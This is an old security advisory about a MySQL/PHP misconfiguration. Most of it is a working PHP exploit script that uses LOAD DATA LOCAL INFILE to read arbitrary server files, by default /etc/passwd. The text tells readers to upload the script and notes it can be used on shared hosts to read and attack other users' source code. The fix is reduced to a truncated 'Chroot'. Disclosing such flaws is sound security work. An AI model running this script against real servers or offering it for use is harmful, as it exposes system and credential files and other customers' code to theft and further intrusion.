27th Nov 2002 [SBWID-5842]
COMMAND
Poorly configured MySQL/PHP may lead to priviledge escalation
SYSTEMS AFFECTED
?
PROBLEM
Update (28 November 2002)
======
This issue was originally investigated by Dave Wilson who claims the
code :
http://botanicus.net/dw/sec.html
Hai Nam Luke [http://www.hackervn.net] found :
Attacker can use PHP and mySQL to read some local file following this
way:
# Create a database (mySQL) and upload this file to your server PHP
Code: viewfile.php (programmed by Luke)
======================================================
<?
// config this data
$dbhost = "";$dbuser = "";$dbpasswd = "";$dbname = "";
$file = "/etc/passwd";
// filename that you wanna view
// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser, $dbpasswd);
$sql = array (
"USE $dbname",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time
()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE
$tbl FIELDS " . "TERMINATED BY
'__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($query,MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
} echo "</pre>";?>
======================================================
You'll receive all source of /etc/passwd
This vulnerable is very dangerous because user can read some important
file in your server. Especially, at any free host, user can use local
exploit to read source code of other user and attack one another.
SOLUTION
Chroot ...